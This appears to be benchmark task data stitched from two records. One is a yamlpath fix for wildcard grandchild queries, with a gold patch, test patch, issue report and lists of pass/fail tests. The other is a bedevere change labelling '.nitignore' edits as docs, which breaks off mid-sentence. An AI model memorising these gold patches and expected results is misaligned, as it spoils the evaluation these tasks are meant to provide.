+ self.logger.debug(
+ "Yielding matched child node of source data:"
+ , prefix=dbg_prefix, data={'NODE': all_coord, 'DATA': data})
+ yield all_coord
+
def _get_required_nodes(
self, data: Any, yaml_path: YAMLPath, depth: int = 0, **kwargs: Any
) -> Generator[NodeCoords, None, None]:
diff --git a/yamlpath/yamlpath.py b/yamlpath/yamlpath.py
index 759bafd..132e8e1 100644
--- a/yamlpath/yamlpath.py
+++ b/yamlpath/yamlpath.py
@@ -798,10 +798,9 @@ class YAMLPath:
segment_len = len(segment_id)
if splat_count == 1:
if segment_len == 1:
- # /*/ -> [.=~/.*/]
- coal_type = PathSegmentTypes.SEARCH
- coal_value = SearchTerms(
- False, PathSearchMethods.REGEX, ".", ".*")
+ # /*/ -> MATCH_ALL
+ coal_type = PathSegmentTypes.MATCH_ALL
+ coal_value = None
elif splat_pos == 0:
# /*text/ -> [.$text]
coal_type = PathSegmentTypes.SEARCH
@@ -877,6 +876,10 @@ class YAMLPath:
)
elif segment_type == PathSegmentTypes.INDEX:
ppath += "[{}]".format(segment_attrs)
+ elif segment_type == PathSegmentTypes.MATCH_ALL:
+ if add_sep:
+ ppath += pathsep
+ ppath += "*"
elif segment_type == PathSegmentTypes.ANCHOR:
if add_sep:
ppath += "[&{}]".format(segment_attrs)
@@ -886,17 +889,7 @@ class YAMLPath:
ppath += str(segment_attrs)
elif (segment_type == PathSegmentTypes.SEARCH
and isinstance(segment_attrs, SearchTerms)):
- terms: SearchTerms = segment_attrs
- if (terms.method == PathSearchMethods.REGEX
- and terms.attribute == "."
- and terms.term == ".*"
- and not terms.inverted
- ):
- if add_sep:
- ppath += pathsep
- ppath += "*"
- else:
- ppath += str(segment_attrs)
+ ppath += str(segment_attrs)
elif segment_type == PathSegmentTypes.COLLECTOR:
ppath += str(segment_attrs)
elif segment_type == PathSegmentTypes.TRAVERSE:
|
wwkimball/yamlpath
|
d2b693ca756638122697288ea25cc02310b00842
|
diff --git a/tests/test_processor.py b/tests/test_processor.py
index a205d18..34e6ebd 100644
--- a/tests/test_processor.py
+++ b/tests/test_processor.py
@@ -82,7 +82,11 @@ class Test_Processor():
("/array_of_hashes/**", [1, "one", 2, "two"], True, None),
("products_hash.*[dimensions.weight==4].(availability.start.date)+(availability.stop.date)", [[date(2020, 8, 1), date(2020, 9, 25)], [date(2020, 1, 1), date(2020, 1, 1)]], True, None),
("products_array[dimensions.weight==4].product", ["doohickey", "widget"], True, None),
- ("(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight", [10], True, None)
+ ("(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight", [10], True, None),
+ ("/Locations/*/*", ["ny", "bstn"], True, None),
+ ("/AoH_Locations/*/*/*", ["nyc", "bo"], True, None),
+ ("/Weird_AoH_Locations/*/*/*", ["nyc", "bstn"], True, None),
+ ("/Set_Locations/*/*", ["New York", "Boston"], True, None),
])
def test_get_nodes(self, quiet_logger, yamlpath, results, mustexist, default):
yamldata = """---
@@ -222,7 +226,35 @@ products_array:
height: 10
depth: 1
weight: 4
+
###############################################################################
+# For wildcard matching (#154)
+Locations:
+ United States:
+ New York: ny
+ Boston: bstn
+ Canada: cnd
+
+AoH_Locations:
+ - United States: us
+ New York:
+ New York City: nyc
+ Massachussets:
+ Boston: bo
+ - Canada: ca
+
+# Weird Array-of-Hashes
+Weird_AoH_Locations:
+ - United States:
+ New York: nyc
+ Boston: bstn
+ - Canada: cnd
+
+Set_Locations:
+ United States: !!set
+ ? New York
+ ? Boston
+ Canada:
"""
yaml = YAML()
processor = Processor(quiet_logger, yaml.load(yamldata))
|
Unexpected nodes returned for grandchild query /Locations/*/*
## Operating System
1. Name/Distribution: Windows 10 Home
2. Version: 10.0.19043 Build 19043
## Version of Python and packages in use at the time of the issue.
1. [Distribution](https://wiki.python.org/moin/PythonDistributions): CPython (for Windows) from python.org
2. Python Version: 3.7
3. Version of yamlpath installed: 3.6.3
4. Version of ruamel.yaml installed: 0.17.10
## Minimum sample of YAML (or compatible) data necessary to trigger the issue
```yaml
---
Locations:
United States:
New York:
Boston:
Canada:
```
## Complete steps to reproduce the issue when triggered via:
1. Command-Line Tools (yaml-get, yaml-set, or eyaml-rotate-keys): Precise command-line arguments which trigger the defect.
2. Libraries (yamlpath.*): Minimum amount of code necessary to trigger the defect.
I thought that a complete unittest might be the most helpful way to demonstrate my issue. Please let me know if another format would be more helpful.
```python
import unittest
import yamlpath
from yamlpath.wrappers import ConsolePrinter
from yamlpath.common import Parsers
from yamlpath import Processor
from yamlpath.exceptions.yamlpathexception import YAMLPathException
from types import SimpleNamespace
class IssueReportTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_retrieveGrandChildren_OnlyGrandChildrenAreReturned(self):
yamlTagHierarchy = '''---
Locations:
United States:
New York:
Boston:
Canada:
'''
logging_args = SimpleNamespace(quiet=True, verbose=False, debug=False)
self._log = ConsolePrinter(logging_args)
self._editor = Parsers.get_yaml_editor()
(yaml_data, doc_loaded) = Parsers.get_yaml_data(self._editor, self._log, yamlTagHierarchy, literal=True)
self._processor = Processor(self._log, yaml_data)
nodes = list(self._processor.get_nodes("/Locations/*/*"))
self.assertEqual(nodes[0].parentref, "New York")
self.assertEqual(nodes[1].parentref, "Boston")
self.assertEqual(len(nodes), 2, f"Node '{nodes[2].parentref}' should not be part of this list, or?")
```
## Expected Outcome
When I try to select a specific level of descendant nodes using child and wildcard operators I expect to receive only nodes at the requested level. For example, in the above sample I expect "/Locations/*/*" to return "New York" and "Boston" (grandchildren of "Locations")
## Actual Outcome
If another branch of the YAML tree ends above the requested level, the query returns the last leaf on that branch. The above example returns "Canada" in addition to "New York" and "Boston", which is surprising to me as "Canada" is merely a child of "Locations", while "New York" and "Boston" are grandchildren. I haven't been able to identify an easy way to distinguish the child nodes from the grandchild nodes.
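For completeness, the same reproduction condensed into a few lines, reusing the API calls from the unittest above; with the expected behavior, only the grandchild keys come back:

```python
from types import SimpleNamespace
from yamlpath.common import Parsers
from yamlpath.wrappers import ConsolePrinter
from yamlpath import Processor

yaml_source = """---
Locations:
  United States:
    New York:
    Boston:
  Canada:
"""
log = ConsolePrinter(SimpleNamespace(quiet=True, verbose=False, debug=False))
editor = Parsers.get_yaml_editor()
yaml_data, _ = Parsers.get_yaml_data(editor, log, yaml_source, literal=True)
nodes = list(Processor(log, yaml_data).get_nodes("/Locations/*/*"))
print([node.parentref for node in nodes])  # expected: ['New York', 'Boston']
```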
## Thank you
Thanks so much for considering this. I was thrilled to find yamlpath for a hobby project and really appreciate the library. I hope that I'm actually reporting a real issue rather than flaunting my ignorance of how the wildcard operator should work.
|
0.0
|
d2b693ca756638122697288ea25cc02310b00842
|
[
"tests/test_processor.py::Test_Processor::test_get_nodes[/Locations/*/*-results38-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/AoH_Locations/*/*/*-results39-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/Weird_AoH_Locations/*/*/*-results40-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/Set_Locations/*/*-results41-True-None]"
] |
[
"tests/test_processor.py::Test_Processor::test_get_none_data_nodes",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[&aliasAnchorOne]-results0-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[&newAlias]-results1-False-Not",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[0]-results2-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases.0-results3-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(array_of_hashes.name)+(rollback_hashes.on_condition.failure.name)-results4-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/array_of_hashes/name-results5-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[1:2]-results6-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[1:1]-results7-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[bravo:charlie]-results8-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/&arrayOfHashes/1/step-results9-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step=1].name-results10-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.!=][.=1.1]-results11-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.!=][.>1.1][.<3.3]-results12-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.^Hey]-results13-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.$Value]-results14-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.%Value]-results15-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step>1].name-results16-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step<2].name-results17-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.>charlie]-results18-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.>=charlie]-results19-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.<bravo]-results20-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.<=bravo]-results21-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.=~/^\\\\w{6,}$/]-results22-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[alpha=1.1]-results23-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+(/rollback_hashes/on_condition/failure/step)-(disabled_steps)-results24-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+((/rollback_hashes/on_condition/failure/step)-(disabled_steps))-results25-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(disabled_steps)+(&arrayOfHashes.step)-results26-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+(disabled_steps)[1]-results27-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[((&arrayOfHashes.step)[1])[0]-results28-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[does.not.previously.exist[7]-results29-False-Huzzah!]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/number_keys/1-results30-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[**.[.^Hey]-results31-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/**/Hey*-results32-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[lots_of_names.**.name-results33-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/array_of_hashes/**-results34-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[products_hash.*[dimensions.weight==4].(availability.start.date)+(availability.stop.date)-results35-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[products_array[dimensions.weight==4].product-results36-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight-results37-True-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends-results0-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends.*bb-results1-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[A:S]-results2-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[2]-results3-Array",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[&bl_anchor]-results4-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends([A:M])+([T:Z])-results5-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends([A:Z])-([S:Z])-results6-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-**-results7-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends-results8-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends.*bb-results9-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[A:S]-results10-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[2]-results11-Array",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[&bl_anchor]-results12-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends([A:M])+([T:Z])-results13-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends([A:Z])-([S:Z])-results14-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-**-results15-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends(rbi)+(errate)-results16-Cannot",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends.Ted\\\\",
"tests/test_processor.py::Test_Processor::test_change_values_in_sets[aliases[&bl_anchor]-REPLACEMENT-**.&bl_anchor-2]",
"tests/test_processor.py::Test_Processor::test_change_values_in_sets[baseball_legends.Sammy\\\\",
"tests/test_processor.py::Test_Processor::test_delete_from_sets[**[&bl_anchor]-old_deleted_nodes0-new_flat_data0]",
"tests/test_processor.py::Test_Processor::test_delete_from_sets[/baseball_legends/Ken\\\\",
"tests/test_processor.py::Test_Processor::test_enforce_pathsep",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[abc-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.>4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.<4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.>=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.<=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.>4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.<4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.>=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.<=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[abc.**-True]",
"tests/test_processor.py::Test_Processor::test_illegal_traversal_recursion",
"tests/test_processor.py::Test_Processor::test_set_value_in_empty_data",
"tests/test_processor.py::Test_Processor::test_set_value_in_none_data",
"tests/test_processor.py::Test_Processor::test_set_value[aliases[&testAnchor]-Updated",
"tests/test_processor.py::Test_Processor::test_set_value[yamlpath1-New",
"tests/test_processor.py::Test_Processor::test_set_value[/top_array/2-42-1-False-YAMLValueFormats.INT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/positive_float-0.009-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/negative_float--0.009-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/positive_float--2.71828-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/negative_float-5283.4-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/null_value-No",
"tests/test_processor.py::Test_Processor::test_set_value[(top_array[0])+(top_hash.negative_float)+(/null_value)-REPLACEMENT-3-True-YAMLValueFormats.DEFAULT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[(((top_array[0])+(top_hash.negative_float))+(/null_value))-REPLACEMENT-3-False-YAMLValueFormats.DEFAULT-/]",
"tests/test_processor.py::Test_Processor::test_cannot_set_nonexistent_required_node_error",
"tests/test_processor.py::Test_Processor::test_none_data_to_get_nodes_by_path_segment",
"tests/test_processor.py::Test_Processor::test_bad_segment_index_for_get_nodes_by_path_segment",
"tests/test_processor.py::Test_Processor::test_get_nodes_by_unknown_path_segment_error",
"tests/test_processor.py::Test_Processor::test_non_int_slice_error",
"tests/test_processor.py::Test_Processor::test_non_int_array_index_error",
"tests/test_processor.py::Test_Processor::test_nonexistant_path_search_method_error",
"tests/test_processor.py::Test_Processor::test_adjoined_collectors_error",
"tests/test_processor.py::Test_Processor::test_no_attrs_to_arrays_error",
"tests/test_processor.py::Test_Processor::test_no_index_to_hashes_error",
"tests/test_processor.py::Test_Processor::test_get_nodes_array_impossible_type_error",
"tests/test_processor.py::Test_Processor::test_no_attrs_to_scalars_errors",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/anchorKeys[&keyOne]-Set",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/hash[&keyTwo]-Confirm-1-True-YAMLValueFormats.DEFAULT-.]",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/anchorKeys[&recursiveAnchorKey]-Recurse",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/hash[&recursiveAnchorKey]-Recurse",
"tests/test_processor.py::Test_Processor::test_key_anchor_children",
"tests/test_processor.py::Test_Processor::test_cannot_add_novel_alias_keys",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[number-5280-verifications0]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[aliases[&alias_number]-5280-verifications1]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[bool-False-verifications2]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[aliases[&alias_bool]-False-verifications3]",
"tests/test_processor.py::Test_Processor::test_get_singular_collectors[(temps[.",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(/list1)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(/list2)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[((/list1)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(((/list1)",
"tests/test_processor.py::Test_Processor::test_collector_math[(hash.*)-(array[1])-results0]",
"tests/test_processor.py::Test_Processor::test_collector_math[(hash)-(hoh.two.*)-results1]",
"tests/test_processor.py::Test_Processor::test_collector_math[(aoa)-(hoa.two)-results2]",
"tests/test_processor.py::Test_Processor::test_collector_math[(aoh)-(aoh[max(key1)])-results3]",
"tests/test_processor.py::Test_Processor::test_get_every_data_type",
"tests/test_processor.py::Test_Processor::test_delete_nodes[delete_yamlpath0-/-old_deleted_nodes0-new_flat_data0]",
"tests/test_processor.py::Test_Processor::test_delete_nodes[records[1]-.-old_deleted_nodes1-new_flat_data1]",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_delete",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_gather_and_alias",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_alias",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_gather_and_ymk",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_ymk",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_tag",
"tests/test_processor.py::Test_Processor::test_anchor_nodes[alias_path0-anchor_path0--/]",
"tests/test_processor.py::Test_Processor::test_anchor_nodes[a_hash.a_key-some_key--.]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[target-source--.-validations0]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[change_path1-ymk_path1--.-validations1]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[/target-/source--/-validations2]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[target-source-custom_name-.-validations3]",
"tests/test_processor.py::Test_Processor::test_tag_nodes[yaml_path0-!taggidy-/]",
"tests/test_processor.py::Test_Processor::test_tag_nodes[key-taggidy-.]",
"tests/test_processor.py::Test_Processor::test_rename_dict_key[yaml_path0-renamed_key-old_data0-new_data0]",
"tests/test_processor.py::Test_Processor::test_rename_dict_key_cannot_overwrite[yaml_path0-renamed_key-old_data0]",
"tests/test_processor.py::Test_Processor::test_traverse_with_null",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1.key12-results0]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1.&alias_name1.key12-results1]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1[&alias_name1].key12-results2]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/list*[has_child(&anchored_value)][name()]-results0]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/list*[!has_child(&anchored_value)][name()]-results1]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_hash)][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_hash)][name()]-results3]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_key)][name()]-results4]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_key)][name()]-results5]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_value)][name()]-results6]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_value)][name()]-results7]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoh[has_child(&anchored_hash)]/intent-results8]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoh[!has_child(&anchored_hash)]/intent-results9]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoa/*[has_child(&anchored_value)][name()]-results10]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoa/*[!has_child(&anchored_value)][name()]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_array_element_searches[temperature[.",
"tests/test_processor.py::Test_Processor::test_wiki_collectors[consoles[.",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard/setup/action)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard[.!='']/action)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_math[(/standard[.!='']/id)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[(/list1)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[(/list2)",
"tests/test_processor.py::Test_Processor::test_wiki_collector_order_of_ops[((/list1)",
"tests/test_processor.py::Test_Processor::test_wiki_search_array_of_hashes[warriors[power_level",
"tests/test_processor.py::Test_Processor::test_wiki_search_key_names[contrast_ct[.",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[hash_of_hashes.*[!has_child(child_two)]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_hashes/*[!has_child(child_two)]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/hash_of_hashes/*[!has_child(child_two)][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_hashes.*[!has_child(child_two)].id-results3]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_arrays/*[!has_child(value2.1)]-results4]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_arrays[*!=value2.1]-results5]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[array_of_arrays.*[!has_child(value2.1)][name()]-results6]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/array_of_arrays[*!=value2.1][name()]-results7]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(/array_of_arrays/*[!has_child(value2.1)][name()])[0]-results8]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(array_of_arrays[*!=value2.1][name()])[0]-results9]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(array_of_arrays.*[!has_child(value2.1)][name()])[-1]-results10]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[(/array_of_arrays[*!=value2.1][name()])[-1]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/simple_array[has_child(value1.1)]-results12]",
"tests/test_processor.py::Test_Processor::test_wiki_has_child[/simple_array[!has_child(value1.3)]-results13]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]/price-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)]/price-results3]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[max(price)]/product-results4]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[max(price)][name()]-results5]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[prices_array[max()]-results6]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_aoh[max(price)]-results7]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_hash[max(price)]-results8]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_array[max()]-results9]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bare[max()]-results10]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_aoh[!max(price)])[max(price)]-results11]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_hash[!max(price)])[max(price)]-results12]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_aoh)-(prices_aoh[max(price)])[max(price)]-results13]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[(prices_hash)-(prices_hash[max(price)]).*[max(price)]-results14]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_aoh[!max(price)])[max(price)])[0]-results15]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_hash[!max(price)])[max(price)])[0]-results16]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_aoh[!max(price)])[max(price)])[0].price-results17]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[((prices_hash[!max(price)])[max(price)])[0].price-results18]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]-results19]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)]-results20]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]/price-results21]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)]/price-results22]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_aoh[min(price)]/product-results23]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[/prices_hash[min(price)][name()]-results24]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[prices_array[min()]-results25]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_aoh[min(price)]-results26]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_hash[min(price)]-results27]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bad_prices_array[min()]-results28]",
"tests/test_processor.py::Test_Processor::test_wiki_min_max[bare[min()]-results29]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[**.Opal[parent()][name()]-results0]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*.mohs_hardness[.>7][parent(2)][name()]-results1]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*.[mohs_hardness[1]>7][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_wiki_parent[minerals.*.*(([mohs_hardness[0]>=4])-([mohs_hardness[1]>5]))[name()]-results3]"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-06 19:50:45+00:00
|
isc
| 6,272
|
|
python__bedevere-617
|
diff --git a/bedevere/prtype.py b/bedevere/prtype.py
index 0105e50..bccd879 100644
--- a/bedevere/prtype.py
+++ b/bedevere/prtype.py
@@ -43,7 +43,7 @@ async def classify_by_filepaths(gh, pull_request, filenames):
if util.is_news_dir(filename):
news = True
filepath = pathlib.PurePath(filename)
- if filepath.suffix == ".rst":
+ if filepath.suffix == ".rst" or filepath.name == ".nitignore":
docs = True
elif filepath.name.startswith("test_"):
tests = True
|
python/bedevere
|
b5bcd24e79ad72b47582f89f7e7053f5b3157fa4
|
diff --git a/tests/test_prtype.py b/tests/test_prtype.py
index 4fcaf0c..c9b0777 100644
--- a/tests/test_prtype.py
+++ b/tests/test_prtype.py
@@ -85,6 +85,26 @@ async def test_docs_no_news():
assert gh.post_data[0] == [Labels.docs.value, Labels.skip_news.value]
+async def test_docs_no_news_with_dotnitignore():
+ filenames = {"path/to/docs1.rst", "path/to/.nitignore"}
+ issue = {"labels": [], "labels_url": "https://api.github.com/some/label"}
+ gh = FakeGH(getitem=issue)
+ event_data = {
+ "action": "opened",
+ "number": 1234,
+ "pull_request": {
+ "url": "https://api.github.com/repos/cpython/python/pulls/1234",
+ "statuses_url": "https://api.github.com/some/status",
+ "issue_url": "https://api.github.com/repos/cpython/python/issue/1234",
+ },
+ }
+ await prtype.classify_by_filepaths(gh, event_data["pull_request"], filenames)
+ assert gh.getitem_url == "https://api.github.com/repos/cpython/python/issue/1234"
+ assert len(gh.post_url) == 1
+ assert gh.post_url[0] == "https://api.github.com/some/label"
+ assert gh.post_data[0] == [Labels.docs.value, Labels.skip_news.value]
+
+
async def test_docs_and_news():
filenames = {"/path/to/docs1.rst", f"Misc/NEWS.d/next/Lib/{GOOD_BASENAME}"}
issue = {"labels": [], "labels_url": "https://api.github.com/some/label"}
|
Add docs label for PRs that touch Doc/tools/.nitignore
See e.g. https://github.com/python/cpython/pull/114280 or https://github.com/python/cpython/pull/114194
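A minimal sketch of the classification rule being requested (the helper name is made up; the real check lives in `bedevere/prtype.py`):

```python
import pathlib

# Hypothetical helper illustrating the request: treat Doc/tools/.nitignore
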